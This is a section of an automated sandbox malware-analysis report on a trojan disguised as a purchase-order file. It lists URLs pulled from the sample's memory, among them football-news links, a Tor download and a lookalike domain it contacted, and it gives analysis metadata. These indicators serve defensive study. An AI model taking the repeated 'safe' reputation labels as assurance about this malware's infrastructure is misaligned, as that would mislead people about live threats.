                          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-1183708042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-127371669008042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.liverpool.com/all-about/premier-league08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.liverpool.com/liverpool-fc-news/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-1716615408042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-1995785008042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-0208042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.drfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.484366830.0000000005117000.00000004.00000001.sdmpfalse
                              		high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                		high
                                https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-187608042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpfalse
                                  		high
                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-199616608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://reachplc.hub.loginradius.com&quot;08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-127371669008042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-1994581608042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-123135383708042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpfalse
                                    		high
                                    https://felix.data.tm-awx.com/felix.min.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/all-about/ozan-kabak08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://s2-prod.mirror.co.uk/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/all-about/champions-league08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/all-about/curtis-jones08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/all-about/steven-gerrard08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-1995461608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-1717139108042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schema.org/NewsArticle08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.liverpool.com/schedule/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://schema.org/BreadcrumbList08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                        		high
                                        https://securepubads.g.doubleclick.net/tag/js/gpt.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          		high
                                          http://ocsp.sectigo.com008042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://s2-prod.liverpool.com/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-199619408042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-123135383708042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://felix.data.tm-awx.com/ampconfig.json&quot;08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-0208042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-1994608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-199383608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://schema.org/ListItem08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            		high
                                            https://www.liverpool.com/all-about/georginio-wijnaldum08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://myliverpoolnews.cf408042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://mab.data.tm-awx.com/rhs&quot;08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/andrew-robertson08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://sectigo.com/CPS0C08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://sectigo.com/CPS0D08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-19953308042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-19959008042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://myliverpoolnews.cf08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/transfers08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://reach-id.orbit.tm-awx.com/analytics.js.gz08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-1716486808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-117808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.67.150.212
                                            		myliverpoolnews.cfUnited States
                                            		13335CLOUDFLARENETUSfalse

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Emerald
                                            Analysis ID:383917
                                            Start date:08.04.2021
                                            Start time:12:23:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 13m 1s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:40
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal96.troj.evad.winEXE@35/25@2/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 23.5% (good quality ratio 21.5%)
                                            • Quality average: 78%
